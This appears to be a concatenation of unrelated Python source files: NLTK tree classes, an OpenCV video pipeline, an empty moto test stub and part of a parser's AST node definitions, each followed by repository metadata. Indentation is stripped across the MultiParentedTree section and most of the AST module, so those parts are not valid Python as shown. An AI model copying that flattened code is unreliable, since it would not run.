    def __setitem__(self, index, value):
        # ptree[start:stop] = value
        if isinstance(index, slice):
            start, stop, step = slice_bounds(self, index, allow_step=True)
            # make a copy of value, in case it's an iterator
            if not isinstance(value, (list, tuple)):
                value = list(value)
            # Check for any error conditions, so we can avoid ending
            # up in an inconsistent state if an error does occur.
            for i, child in enumerate(value):
                if isinstance(child, Tree):
                    self._setparent(child, start + i*step, dry_run=True)
            # clear the child pointers of all parents we're removing
            for i in range(start, stop, step):
                if isinstance(self[i], Tree):
                    self._delparent(self[i], i)
            # set the child pointers of the new children.  We do this
            # after clearing *all* child pointers, in case we're e.g.
            # reversing the elements in a tree.
            for i, child in enumerate(value):
                if isinstance(child, Tree):
                    self._setparent(child, start + i*step)
            # finally, update the content of the child list itself.
            super(AbstractParentedTree, self).__setitem__(index, value)
        # ptree[i] = value
        elif isinstance(index, int):
            if index < 0: index += len(self)
            if index < 0: raise IndexError('index out of range')
            # if the value is not changing, do nothing.
            if value is self[index]:
                return
            # Set the new child's parent pointer.
            if isinstance(value, Tree):
                self._setparent(value, index)
            # Remove the old child's parent pointer
            if isinstance(self[index], Tree):
                self._delparent(self[index], index)
            # Update our child list.
            super(AbstractParentedTree, self).__setitem__(index, value)
        elif isinstance(index, (list, tuple)):
            # ptree[()] = value
            if len(index) == 0:
                raise IndexError('The tree position () may not be assigned to.')
            # ptree[(i,)] = value
            elif len(index) == 1:
                self[index[0]] = value
            # ptree[i1, i2, i3] = value: recurse into the subtree at i1.
            else:
                self[index[0]][index[1:]] = value
        else:
            raise TypeError("%s indices must be integers, not %s" %
                            (type(self).__name__, type(index).__name__))
    def append(self, child):
        if isinstance(child, Tree):
            self._setparent(child, len(self))
        super(AbstractParentedTree, self).append(child)
    def extend(self, children):
        # Children are appended one at a time (via the parent class's
        # append) so that len(self) is the correct index for _setparent.
        for child in children:
            if isinstance(child, Tree):
                self._setparent(child, len(self))
            super(AbstractParentedTree, self).append(child)
    def insert(self, index, child):
        # Handle negative indexes.  Note that if index < -len(self),
        # we do *not* raise an IndexError, unlike __getitem__.  This
        # is done for consistency with list.__getitem__ and list.index.
        if index < 0: index += len(self)
        if index < 0: index = 0
        # Set the child's parent, and update our child list.
        if isinstance(child, Tree):
            self._setparent(child, index)
        super(AbstractParentedTree, self).insert(index, child)
    def pop(self, index=-1):
        if index < 0: index += len(self)
        if index < 0: raise IndexError('index out of range')
        if isinstance(self[index], Tree):
            self._delparent(self[index], index)
        return super(AbstractParentedTree, self).pop(index)
    # n.b.: like `list`, this is done by equality, not identity!
    # To remove a specific child, use del ptree[i].
    def remove(self, child):
        index = self.index(child)
        if isinstance(self[index], Tree):
            self._delparent(self[index], index)
        super(AbstractParentedTree, self).remove(child)
    # We need to implement __getslice__ and friends, even though
    # they're deprecated, because otherwise list.__getslice__ will get
    # called (since we're subclassing from list).  Just delegate to
    # __getitem__ etc., but use max(0, start) and max(0, stop) because
    # negative indices are already handled *before*
    # __getslice__ is called; and we don't want to double-count them.
    if hasattr(list, '__getslice__'):
        def __getslice__(self, start, stop):
            return self.__getitem__(slice(max(0, start), max(0, stop)))
        def __delslice__(self, start, stop):
            return self.__delitem__(slice(max(0, start), max(0, stop)))
        def __setslice__(self, start, stop, value):
            return self.__setitem__(slice(max(0, start), max(0, stop)), value)
class ParentedTree(AbstractParentedTree):
    """
    A ``Tree`` that automatically maintains parent pointers for
    single-parented trees.  The following are methods for querying
    the structure of a parented tree: ``parent``, ``parent_index``,
    ``left_sibling``, ``right_sibling``, ``root``, ``treeposition``.

    Each ``ParentedTree`` may have at most one parent.  In
    particular, subtrees may not be shared.  Any attempt to reuse a
    single ``ParentedTree`` as a child of more than one parent (or
    as multiple children of the same parent) will cause a
    ``ValueError`` exception to be raised.

    ``ParentedTrees`` should never be used in the same tree as ``Trees``
    or ``MultiParentedTrees``.  Mixing tree implementations may result
    in incorrect parent pointers and in ``TypeError`` exceptions.
    """
    def __init__(self, node, children=None):
        self._parent = None
        """The parent of this Tree, or None if it has no parent."""
        super(ParentedTree, self).__init__(node, children)
        if children is None:
            # If children is None, the tree is read from node.
            # After parsing, the parent of the immediate children
            # will point to an intermediate tree, not self.
            # We fix this by brute force:
            for i, child in enumerate(self):
                if isinstance(child, Tree):
                    child._parent = None
                    self._setparent(child, i)
    def _frozen_class(self): return ImmutableParentedTree
    #/////////////////////////////////////////////////////////////////
    # Methods
    #/////////////////////////////////////////////////////////////////
    def parent(self):
        """The parent of this tree, or None if it has no parent."""
        return self._parent
    def parent_index(self):
        """
        The index of this tree in its parent.  I.e.,
        ``ptree.parent()[ptree.parent_index()] is ptree``.  Note that
        ``ptree.parent_index()`` is not necessarily equal to
        ``ptree.parent.index(ptree)``, since the ``index()`` method
        returns the first child that is equal to its argument.
        """
        if self._parent is None: return None
        # Search by identity, not equality (see docstring above).
        for i, child in enumerate(self._parent):
            if child is self: return i
        assert False, 'expected to find self in self._parent!'
    def left_sibling(self):
        """The left sibling of this tree, or None if it has none."""
        parent_index = self.parent_index()
        if self._parent and parent_index > 0:
            return self._parent[parent_index-1]
        return None # no left sibling
    def right_sibling(self):
        """The right sibling of this tree, or None if it has none."""
        parent_index = self.parent_index()
        if self._parent and parent_index < (len(self._parent)-1):
            return self._parent[parent_index+1]
        return None # no right sibling
    def root(self):
        """
        The root of this tree.  I.e., the unique ancestor of this tree
        whose parent is None.  If ``ptree.parent()`` is None, then
        ``ptree`` is its own root.
        """
        root = self
        while root.parent() is not None:
            root = root.parent()
        return root
    def treeposition(self):
        """
        The tree position of this tree, relative to the root of the
        tree.  I.e., ``ptree.root[ptree.treeposition] is ptree``.
        """
        if self.parent() is None:
            return ()
        else:
            return self.parent().treeposition() + (self.parent_index(),)
    #/////////////////////////////////////////////////////////////////
    # Parent Management
    #/////////////////////////////////////////////////////////////////
    def _delparent(self, child, index):
        # Sanity checks
        assert isinstance(child, ParentedTree)
        assert self[index] is child
        assert child._parent is self
        # Delete child's parent pointer.
        child._parent = None
    def _setparent(self, child, index, dry_run=False):
        # If the child's type is incorrect, then complain.
        if not isinstance(child, ParentedTree):
            raise TypeError('Can not insert a non-ParentedTree '+
                            'into a ParentedTree')
        # If child already has a parent, then complain.
        if child._parent is not None:
            raise ValueError('Can not insert a subtree that already '
                             'has a parent.')
        # Set child's parent pointer & index.
        if not dry_run:
            child._parent = self
class MultiParentedTree(AbstractParentedTree):
"""
A ``Tree`` that automatically maintains parent pointers for
multi-parented trees. The following are methods for querying the
structure of a multi-parented tree: ``parents()``, ``parent_indices()``,
``left_siblings()``, ``right_siblings()``, ``roots``, ``treepositions``.
Each ``MultiParentedTree`` may have zero or more parents. In
particular, subtrees may be shared. If a single
``MultiParentedTree`` is used as multiple children of the same
parent, then that parent will appear multiple times in its
``parents()`` method.
``MultiParentedTrees`` should never be used in the same tree as
``Trees`` or ``ParentedTrees``. Mixing tree implementations may
result in incorrect parent pointers and in ``TypeError`` exceptions.
"""
def __init__(self, node, children=None):
self._parents = []
"""A list of this tree's parents. This list should not
contain duplicates, even if a parent contains this tree
multiple times."""
super(MultiParentedTree, self).__init__(node, children)
if children is None:
# If children is None, the tree is read from node.
# After parsing, the parent(s) of the immediate children
# will point to an intermediate tree, not self.
# We fix this by brute force:
for i, child in enumerate(self):
if isinstance(child, Tree):
child._parents = []
self._setparent(child, i)
def _frozen_class(self): return ImmutableMultiParentedTree
#/////////////////////////////////////////////////////////////////
# Methods
#/////////////////////////////////////////////////////////////////
def parents(self):
"""
The set of parents of this tree. If this tree has no parents,
then ``parents`` is the empty set. To check if a tree is used
as multiple children of the same parent, use the
``parent_indices()`` method.
:type: list(MultiParentedTree)
"""
return list(self._parents)
def left_siblings(self):
"""
A list of all left siblings of this tree, in any of its parent
trees. A tree may be its own left sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the left sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index-1]
for (parent, index) in self._get_parent_indices()
if index > 0]
def right_siblings(self):
"""
A list of all right siblings of this tree, in any of its parent
trees. A tree may be its own right sibling if it is used as
multiple contiguous children of the same parent. A tree may
appear multiple times in this list if it is the right sibling
of this tree with respect to multiple parents.
:type: list(MultiParentedTree)
"""
return [parent[index+1]
for (parent, index) in self._get_parent_indices()
if index < (len(parent)-1)]
def _get_parent_indices(self):
return [(parent, index)
for parent in self._parents
for index, child in enumerate(parent)
if child is self]
def roots(self):
"""
The set of all roots of this tree. This set is formed by
tracing all possible parent paths until trees with no parents
are found.
:type: list(MultiParentedTree)
"""
return list(self._get_roots_helper({}).values())
def _get_roots_helper(self, result):
if self._parents:
for parent in self._parents:
parent._get_roots_helper(result)
else:
result[id(self)] = self
return result
def parent_indices(self, parent):
"""
Return a list of the indices where this tree occurs as a child
of ``parent``. If this child does not occur as a child of
``parent``, then the empty list is returned. The following is
always true::
for parent_index in ptree.parent_indices(parent):
parent[parent_index] is ptree
"""
if parent not in self._parents: return []
else: return [index for (index, child) in enumerate(parent)
if child is self]
def treepositions(self, root):
"""
Return a list of all tree positions that can be used to reach
this multi-parented tree starting from ``root``. I.e., the
following is always true::
for treepos in ptree.treepositions(root):
root[treepos] is ptree
"""
if self is root:
return [()]
else:
return [treepos+(index,)
for parent in self._parents
for treepos in parent.treepositions(root)
for (index, child) in enumerate(parent) if child is self]
#/////////////////////////////////////////////////////////////////
# Parent Management
#/////////////////////////////////////////////////////////////////
    def _delparent(self, child, index):
        """
        Update ``child``'s parent pointers after ``self[index]`` (which
        must currently be ``child``) is removed.  ``self`` is removed
        from ``child._parents`` only when ``index`` held the last
        remaining occurrence of ``child`` in ``self``.
        """
        # Sanity checks
        assert isinstance(child, MultiParentedTree)
        assert self[index] is child
        assert len([p for p in child._parents if p is self]) == 1
        # If the only copy of child in self is at index, then delete
        # self from child's parent list.
        for i, c in enumerate(self):
            # Found another occurrence of child: keep the parent link.
            if c is child and i != index: break
        else:
            # Loop fell through without break: no other occurrence.
            child._parents.remove(self)
    def _setparent(self, child, index, dry_run=False):
        """
        Register ``self`` as a parent of ``child`` (about to be stored
        at ``self[index]``).  When ``dry_run`` is true only the type
        check is performed, so errors can be raised before any state
        is mutated.
        """
        # If the child's type is incorrect, then complain.
        if not isinstance(child, MultiParentedTree):
            raise TypeError('Can not insert a non-MultiParentedTree '+
                            'into a MultiParentedTree')
        # Add self as a parent pointer if it's not already listed.
        if not dry_run:
            for parent in child._parents:
                # Already registered as a parent: nothing to do.
                if parent is self: break
            else:
                child._parents.append(self)
class ImmutableParentedTree(ImmutableTree, ParentedTree):
    """An immutable (hashable) variant of ``ParentedTree``."""
    pass
class ImmutableMultiParentedTree(ImmutableTree, MultiParentedTree):
    """An immutable (hashable) variant of ``MultiParentedTree``."""
    pass
######################################################################
## Probabilistic trees
######################################################################
@python_2_unicode_compatible
class ProbabilisticTree(Tree, ProbabilisticMixIn):
    """
    A ``Tree`` that carries a probability (or log-probability) through
    ``ProbabilisticMixIn``, e.g. as produced by probabilistic parsers.
    """
    def __init__(self, node, children=None, **prob_kwargs):
        Tree.__init__(self, node, children)
        ProbabilisticMixIn.__init__(self, **prob_kwargs)
    # We have to patch up these methods to make them work right:
    def _frozen_class(self): return ImmutableProbabilisticTree
    def __repr__(self):
        return '%s (p=%r)' % (Tree.unicode_repr(self), self.prob())
    def __str__(self):
        return '%s (p=%.6g)' % (self.pformat(margin=60), self.prob())
    def copy(self, deep=False):
        # Shallow copy shares child references; deep copy converts the
        # whole subtree, preserving each node's probability.
        if not deep: return type(self)(self._label, self, prob=self.prob())
        else: return type(self).convert(self)
    @classmethod
    def convert(cls, val):
        # Recursively convert a (possibly plain) Tree; nodes without a
        # probability default to prob=1.0.  Leaves pass through as-is.
        if isinstance(val, Tree):
            children = [cls.convert(child) for child in val]
            if isinstance(val, ProbabilisticMixIn):
                return cls(val._label, children, prob=val.prob())
            else:
                return cls(val._label, children, prob=1.0)
        else:
            return val
    def __eq__(self, other):
        # Equal only for same class with equal (label, children, prob).
        return (self.__class__ is other.__class__ and
                (self._label, list(self), self.prob()) ==
                (other._label, list(other), other.prob()))
    def __lt__(self, other):
        if not isinstance(other, Tree):
            raise_unorderable_types("<", self, other)
        if self.__class__ is other.__class__:
            return ((self._label, list(self), self.prob()) <
                    (other._label, list(other), other.prob()))
        else:
            # Different classes order by class name, matching Tree.
            return self.__class__.__name__ < other.__class__.__name__
@python_2_unicode_compatible
class ImmutableProbabilisticTree(ImmutableTree, ProbabilisticMixIn):
    """
    An immutable (hashable) tree carrying a probability through
    ``ProbabilisticMixIn``; the hash covers label, children and prob.
    """
    def __init__(self, node, children=None, **prob_kwargs):
        ImmutableTree.__init__(self, node, children)
        ProbabilisticMixIn.__init__(self, **prob_kwargs)
        # Cache the hash up front; contents can no longer change.
        self._hash = hash((self._label, tuple(self), self.prob()))
    # We have to patch up these methods to make them work right:
    def _frozen_class(self): return ImmutableProbabilisticTree
    def __repr__(self):
        return '%s [%s]' % (Tree.unicode_repr(self), self.prob())
    def __str__(self):
        return '%s [%s]' % (self.pformat(margin=60), self.prob())
    def copy(self, deep=False):
        # Shallow copy shares child references; deep copy converts the
        # whole subtree, preserving each node's probability.
        if not deep: return type(self)(self._label, self, prob=self.prob())
        else: return type(self).convert(self)
    @classmethod
    def convert(cls, val):
        # Recursively convert a (possibly plain) Tree; nodes without a
        # probability default to prob=1.0.  Leaves pass through as-is.
        if isinstance(val, Tree):
            children = [cls.convert(child) for child in val]
            if isinstance(val, ProbabilisticMixIn):
                return cls(val._label, children, prob=val.prob())
            else:
                return cls(val._label, children, prob=1.0)
        else:
            return val
def _child_names(tree):
    """Return each child's label wrapped in ``Nonterminal``; leaves unchanged."""
    return [Nonterminal(child._label) if isinstance(child, Tree) else child
            for child in tree]
######################################################################
## Parsing
######################################################################
def bracket_parse(s):
    """
    Deprecated.  Use ``Tree.fromstring(s, remove_empty_top_bracketing=True)``
    instead.

    :raises NameError: always; this function has been removed.
    """
    # NOTE: the exception type is kept as NameError for backward
    # compatibility with callers that catch it.  The message previously
    # pointed at the nonexistent ``Tree.read``; the rest of this module
    # uses ``Tree.fromstring`` for parsing.
    raise NameError("Use Tree.fromstring(s, remove_empty_top_bracketing=True) instead.")
def sinica_parse(s):
    """
    Parse a Sinica Treebank string and return a tree.  Trees are represented as nested brackettings,
    as shown in the following example (X represents a Chinese character):
    S(goal:NP(Head:Nep:XX)|theme:NP(Head:Nhaa:X)|quantity:Dab:X|Head:VL2:X)#0(PERIODCATEGORY)

    :return: A tree corresponding to the string representation.
    :rtype: Tree
    :param s: The string to be converted
    :type s: str
    """
    # Split on parens, '|' and spaces, keeping the delimiters as tokens.
    tokens = re.split(r'([()| ])', s)
    for i in range(len(tokens)):
        if tokens[i] == '(':
            tokens[i-1], tokens[i] = tokens[i], tokens[i-1] # pull nonterminal inside parens
        elif ':' in tokens[i]:
            fields = tokens[i].split(':')
            if len(fields) == 2: # non-terminal
                # Drop the role tag, keep only the category label.
                tokens[i] = fields[1]
            else:
                # Terminal: wrap POS tag and word as a preterminal node.
                tokens[i] = "(" + fields[-2] + " " + fields[-1] + ")"
        elif tokens[i] == '|':
            tokens[i] = ''
    # Reassemble into Penn-Treebank-style bracketing and parse it.
    treebank_string = " ".join(tokens)
    return Tree.fromstring(treebank_string, remove_empty_top_bracketing=True)

#    s = re.sub(r'^#[^\s]*\s', '', s) # remove leading identifier
#    s = re.sub(r'\w+:', '', s) # remove role tags

#    return s
######################################################################
## Demonstration
######################################################################
def demo():
    """
    A demonstration showing how ``Tree`` and ``ProbabilisticTree`` can be
    used.  It builds a tree from a bracketed string and shows the results
    of calling several tree methods, transforms, and output formats.
    """
    from nltk import Tree, ProbabilisticTree
    # Demonstrate tree parsing.
    s = '(S (NP (DT the) (NN cat)) (VP (VBD ate) (NP (DT a) (NN cookie))))'
    t = Tree.fromstring(s)
    print("Convert bracketed string into tree:")
    print(t)
    print(t.__repr__())
    print("Display tree properties:")
    print(t.label()) # tree's constituent type
    print(t[0]) # tree's first child
    print(t[1]) # tree's second child
    print(t.height())
    print(t.leaves())
    print(t[1])
    print(t[1,1])
    print(t[1,1,0])
    # Demonstrate tree modification.
    the_cat = t[0]
    the_cat.insert(1, Tree.fromstring('(JJ big)'))
    print("Tree modification:")
    print(t)
    t[1,1,1] = Tree.fromstring('(NN cake)')
    print(t)
    print()
    # Tree transforms
    print("Collapse unary:")
    t.collapse_unary()
    print(t)
    print("Chomsky normal form:")
    t.chomsky_normal_form()
    print(t)
    print()
    # Demonstrate probabilistic trees.
    pt = ProbabilisticTree('x', ['y', 'z'], prob=0.5)
    print("Probabilistic Tree:")
    print(pt)
    print()
    # Demonstrate parsing of treebank output format.
    t = Tree.fromstring(t.pformat())
    print("Convert tree to bracketed string and back again:")
    print(t)
    print()
    # Demonstrate LaTeX output
    print("LaTeX output:")
    print(t.pformat_latex_qtree())
    print()
    # Demonstrate Productions
    print("Production output:")
    print(t.productions())
    print()
    # Demonstrate tree nodes containing objects other than strings
    t.set_label(('test', 3))
    print(t)
# Public API of this module (controls ``from ... import *``).
__all__ = ['ImmutableProbabilisticTree', 'ImmutableTree', 'ProbabilisticMixIn',
           'ProbabilisticTree', 'Tree', 'bracket_parse',
           'sinica_parse', 'ParentedTree', 'MultiParentedTree',
           'ImmutableParentedTree', 'ImmutableMultiParentedTree']
| nelango/ViralityAnalysis | model/lib/nltk/tree.py | Python | mit | 64,375 | 0.003216 |
# Copyright 2019 Google LLC.
"""Pipeline to decode and reencode a video using OpenCV."""
from absl import app
from absl import flags
from video_processing import processor_runner
from video_processing.processors import opencv_video_decoder
from video_processing.processors import opencv_video_encoder
# Command-line flags: path of the video to read and the file to write.
flags.DEFINE_string('input_video_file', '', 'Input file.')
flags.DEFINE_string('output_video_file', '', 'Output file.')

FLAGS = flags.FLAGS
def pipeline(input_video_file, output_video_file):
  """Return the processor chain: decode input_video_file, re-encode to output_video_file."""
  decoder = opencv_video_decoder.OpenCVVideoDecoderProcessor(
      {'input_video_file': input_video_file})
  encoder = opencv_video_encoder.OpenCVVideoEncoderProcessor(
      {'output_video_file': output_video_file})
  return [decoder, encoder]
def main(unused_argv):
  """Run the decode/re-encode chain on the files named by the flags."""
  processor_runner.run_processor_chain(
      pipeline(FLAGS.input_video_file, FLAGS.output_video_file))
if __name__ == '__main__':
  # absl parses the command-line flags before invoking main().
  app.run(main)
| learningequality/video-vectorization | video_processing/pipelines/simple_encode_decode.py | Python | mit | 902 | 0.003326 |
import boto
import sure # noqa
from moto import mock_ec2
@mock_ec2
def test_placement_groups():
    # TODO: placeholder — placement-group behavior is not exercised yet.
    # Currently this only checks that the mock_ec2 decorator applies
    # cleanly to an empty test body.
    pass
| andresriancho/moto | tests/test_ec2/test_placement_groups.py | Python | apache-2.0 | 109 | 0 |
# encoding: utf-8
"""
The :mod:`ast` module contains the classes comprising the Python abstract syntax tree.
All attributes ending with ``loc`` contain instances of :class:`.source.Range`
or None. All attributes ending with ``_locs`` contain lists of instances of
:class:`.source.Range` or [].
The attribute ``loc``, present in every class except those inheriting :class:`boolop`,
has a special meaning: it encompasses the entire AST node, so that it is possible
to cut the range contained inside ``loc`` of a parsetree fragment and paste it
somewhere else without altering said parsetree fragment.
The AST format for all supported versions is generally normalized to be a superset
of the native :mod:`..ast` module of the latest supported Python version.
In particular this affects:
* :class:`With`: on 2.6-2.7 it uses the 3.0 format.
* :class:`TryExcept` and :class:`TryFinally`: on 2.6-2.7 they're replaced with
:class:`Try` from 3.0.
* :class:`arguments`: on 2.6-3.1 it uses the 3.2 format, with dedicated
:class:`arg` in ``vararg`` and ``kwarg`` slots.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# Location mixins
class commonloc(object):
    """
    A mixin common for all nodes.

    :cvar _locs: (tuple of strings)
        names of all attributes with location values
    :ivar loc: range encompassing all locations defined for this node
        or its children
    """
    _locs = ("loc",)

    def _reprfields(self):
        """Return the attribute names shown by ``__repr__``: fields then locs."""
        return self._fields + self._locs

    def __repr__(self):
        def value(name):
            # Render one attribute; a missing attribute is flagged loudly
            # instead of crashing the repr (useful while debugging
            # half-constructed nodes).
            try:
                loc = self.__dict__[name]
                if isinstance(loc, list):
                    return "[%s]" % (", ".join(map(repr, loc)))
                else:
                    return repr(loc)
            except Exception:
                # Was a bare ``except:``, which also swallowed
                # KeyboardInterrupt/SystemExit; Exception is sufficient
                # to catch the KeyError from the __dict__ lookup.
                return "(!!!MISSING!!!)"
        fields = ", ".join(map(lambda name: "%s=%s" % (name, value(name)),
                               self._reprfields()))
        return "%s(%s)" % (self.__class__.__name__, fields)

    @property
    def lineno(self):
        """1-based line number of this node's location."""
        return self.loc.line()
class keywordloc(commonloc):
"""
A mixin common for all keyword statements, e.g. ``pass`` and ``yield expr``.
:ivar keyword_loc: location of the keyword, e.g. ``yield``.
"""
_locs = commonloc._locs + ("keyword_loc",)
class beginendloc(commonloc):
"""
A mixin common for nodes with a opening and closing delimiters, e.g. tuples and lists.
:ivar begin_loc: location of the opening delimiter, e.g. ``(``.
:ivar end_loc: location of the closing delimiter, e.g. ``)``.
"""
_locs = commonloc._locs + ("begin_loc", "end_loc")
# AST nodes
class AST(object):
    """
    An ancestor of all nodes.

    :cvar _fields: (tuple of strings)
        names of all attributes with semantic values
    """
    _fields = ()
    def __init__(self, **fields):
        # Each keyword argument becomes an instance attribute.
        for name, value in fields.items():
            setattr(self, name, value)
class alias(AST, commonloc):
"""
An import alias, e.g. ``x as y``.
:ivar name: (string) value to import
:ivar asname: (string) name to add to the environment
:ivar name_loc: location of name
:ivar as_loc: location of ``as``
:ivar asname_loc: location of asname
"""
_fields = ("name", "asname")
_locs = commonloc._locs + ("name_loc", "as_loc", "asname_loc")
class arg(AST, commonloc):
"""
A formal argument, e.g. in ``def f(x)`` or ``def f(x: T)``.
:ivar arg: (string) argument name
:ivar annotation: (:class:`AST`) type annotation, if any; **emitted since 3.0**
:ivar arg_loc: location of argument name
:ivar colon_loc: location of ``:``, if any; **emitted since 3.0**
"""
_fields = ("arg", "annotation")
_locs = commonloc._locs + ("arg_loc", "colon_loc")
class arguments(AST, beginendloc):
"""
Function definition arguments, e.g. in ``def f(x, y=1, *z, **t)``.
:ivar args: (list of :class:`arg`) regular formal arguments
:ivar defaults: (list of :class:`AST`) values of default arguments
:ivar vararg: (:class:`arg`) splat formal argument (if any), e.g. in ``*x``
:ivar kwonlyargs: (list of :class:`arg`) keyword-only (post-\*) formal arguments;
**emitted since 3.0**
:ivar kw_defaults: (list of :class:`AST`) values of default keyword-only arguments;
**emitted since 3.0**
:ivar kwarg: (:class:`arg`) keyword splat formal argument (if any), e.g. in ``**x``
:ivar star_loc: location of ``*``, if any
:ivar dstar_loc: location of ``**``, if any
:ivar equals_locs: locations of ``=``
:ivar kw_equals_locs: locations of ``=`` of default keyword-only arguments;
**emitted since 3.0**
"""
_fields = ("args", "vararg", "kwonlyargs", "kwarg", "defaults", "kw_defaults")
_locs = beginendloc._locs + ("star_loc", "dstar_loc", "equals_locs", "kw_equals_locs")
class boolop(AST, commonloc):
"""
Base class for binary boolean operators.
This class is unlike others in that it does not have the ``loc`` field.
It serves only as an indicator of operation and corresponds to no source
itself; locations are recorded in :class:`BoolOp`.
"""
_locs = ()
class And(boolop):
"""The ``and`` operator."""
class Or(boolop):
"""The ``or`` operator."""
class cmpop(AST, commonloc):
"""Base class for comparison operators."""
class Eq(cmpop):
"""The ``==`` operator."""
class Gt(cmpop):
"""The ``>`` operator."""
class GtE(cmpop):
"""The ``>=`` operator."""
class In(cmpop):
"""The ``in`` operator."""
class Is(cmpop):
"""The ``is`` operator."""
class IsNot(cmpop):
"""The ``is not`` operator."""
class Lt(cmpop):
"""The ``<`` operator."""
class LtE(cmpop):
"""The ``<=`` operator."""
class NotEq(cmpop):
"""The ``!=`` (or deprecated ``<>``) operator."""
class NotIn(cmpop):
"""The ``not in`` operator."""
class comprehension(AST, commonloc):
"""
A single ``for`` list comprehension clause.
:ivar target: (assignable :class:`AST`) the variable(s) bound in comprehension body
:ivar iter: (:class:`AST`) the expression being iterated
:ivar ifs: (list of :class:`AST`) the ``if`` clauses
:ivar for_loc: location of the ``for`` keyword
:ivar in_loc: location of the ``in`` keyword
:ivar if_locs: locations of ``if`` keywords
"""
_fields = ("target", "iter", "ifs")
_locs = commonloc._locs + ("for_loc", "in_loc", "if_locs")
class excepthandler(AST, commonloc):
"""Base class for the exception handler."""
class ExceptHandler(excepthandler):
"""
An exception handler, e.g. ``except x as y:· z``.
:ivar type: (:class:`AST`) type of handled exception, if any
:ivar name: (assignable :class:`AST` **until 3.0**, string **since 3.0**)
variable bound to exception, if any
:ivar body: (list of :class:`AST`) code to execute when exception is caught
:ivar except_loc: location of ``except``
:ivar as_loc: location of ``as``, if any
:ivar name_loc: location of variable name
:ivar colon_loc: location of ``:``
"""
_fields = ("type", "name", "body")
_locs = excepthandler._locs + ("except_loc", "as_loc", "name_loc", "colon_loc")
class expr(AST, commonloc):
"""Base class for expression nodes."""
class Attribute(expr):
"""
An attribute access, e.g. ``x.y``.
:ivar value: (:class:`AST`) left-hand side
:ivar attr: (string) attribute name
"""
_fields = ("value", "attr", "ctx")
_locs = expr._locs + ("dot_loc", "attr_loc")
class BinOp(expr):
"""
A binary operation, e.g. ``x + y``.
:ivar left: (:class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar right: (:class:`AST`) right-hand side
"""
_fields = ("left", "op", "right")
class BoolOp(expr):
"""
A boolean operation, e.g. ``x and y``.
:ivar op: (:class:`boolop`) operator
:ivar values: (list of :class:`AST`) operands
:ivar op_locs: locations of operators
"""
_fields = ("op", "values")
_locs = expr._locs + ("op_locs",)
class Call(expr, beginendloc):
"""
A function call, e.g. ``f(x, y=1, *z, **t)``.
:ivar func: (:class:`AST`) function to call
:ivar args: (list of :class:`AST`) regular arguments
:ivar keywords: (list of :class:`keyword`) keyword arguments
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``
:ivar star_loc: location of ``*``, if any
:ivar dstar_loc: location of ``**``, if any
"""
_fields = ("func", "args", "keywords", "starargs", "kwargs")
_locs = beginendloc._locs + ("star_loc", "dstar_loc")
class Compare(expr):
"""
A comparison operation, e.g. ``x < y`` or ``x < y > z``.
:ivar left: (:class:`AST`) left-hand
:ivar ops: (list of :class:`cmpop`) compare operators
:ivar comparators: (list of :class:`AST`) compare values
"""
_fields = ("left", "ops", "comparators")
class Dict(expr, beginendloc):
"""
A dictionary, e.g. ``{x: y}``.
:ivar keys: (list of :class:`AST`) keys
:ivar values: (list of :class:`AST`) values
:ivar colon_locs: locations of ``:``
"""
_fields = ("keys", "values")
_locs = beginendloc._locs + ("colon_locs",)
class DictComp(expr, beginendloc):
"""
A list comprehension, e.g. ``{x: y for x,y in z}``.
**Emitted since 2.7.**
:ivar key: (:class:`AST`) key part of comprehension body
:ivar value: (:class:`AST`) value part of comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
:ivar colon_loc: location of ``:``
"""
_fields = ("key", "value", "generators")
_locs = beginendloc._locs + ("colon_loc",)
class Ellipsis(expr):
"""The ellipsis, e.g. in ``x[...]``."""
class GeneratorExp(expr, beginendloc):
"""
A generator expression, e.g. ``(x for x in y)``.
:ivar elt: (:class:`AST`) expression body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class IfExp(expr):
"""
A conditional expression, e.g. ``x if y else z``.
:ivar test: (:class:`AST`) condition
:ivar body: (:class:`AST`) value if true
:ivar orelse: (:class:`AST`) value if false
:ivar if_loc: location of ``if``
:ivar else_loc: location of ``else``
"""
_fields = ("test", "body", "orelse")
_locs = expr._locs + ("if_loc", "else_loc")
class Lambda(expr):
"""
A lambda expression, e.g. ``lambda x: x*x``.
:ivar args: (:class:`arguments`) arguments
:ivar body: (:class:`AST`) body
:ivar lambda_loc: location of ``lambda``
:ivar colon_loc: location of ``:``
"""
_fields = ("args", "body")
_locs = expr._locs + ("lambda_loc", "colon_loc")
class List(expr, beginendloc):
"""
A list, e.g. ``[x, y]``.
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts", "ctx")
class ListComp(expr, beginendloc):
"""
A list comprehension, e.g. ``[x for x in y]``.
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Name(expr):
"""
An identifier, e.g. ``x``.
:ivar id: (string) name
"""
_fields = ("id", "ctx")
class NameConstant(expr):
"""
A named constant, e.g. ``None``.
:ivar value: Python value, one of ``None``, ``True`` or ``False``
"""
_fields = ("value",)
class Num(expr):
"""
An integer, floating point or complex number, e.g. ``1``, ``1.0`` or ``1.0j``.
:ivar n: (int, float or complex) value
"""
_fields = ("n",)
class Repr(expr, beginendloc):
"""
A repr operation, e.g. ``\`x\```
**Emitted until 3.0.**
:ivar value: (:class:`AST`) value
"""
_fields = ("value",)
class Set(expr, beginendloc):
"""
A set, e.g. ``{x, y}``.
**Emitted since 2.7.**
:ivar elts: (list of :class:`AST`) elements
"""
_fields = ("elts",)
class SetComp(expr, beginendloc):
"""
A set comprehension, e.g. ``{x for x in y}``.
**Emitted since 2.7.**
:ivar elt: (:class:`AST`) comprehension body
:ivar generators: (list of :class:`comprehension`) ``for`` clauses
"""
_fields = ("elt", "generators")
class Str(expr, beginendloc):
"""
A string, e.g. ``"x"``.
:ivar s: (string) value
"""
_fields = ("s",)
class Starred(expr):
"""
A starred expression, e.g. ``*x`` in ``*x, y = z``.
:ivar value: (:class:`AST`) expression
:ivar star_loc: location of ``*``
"""
_fields = ("value", "ctx")
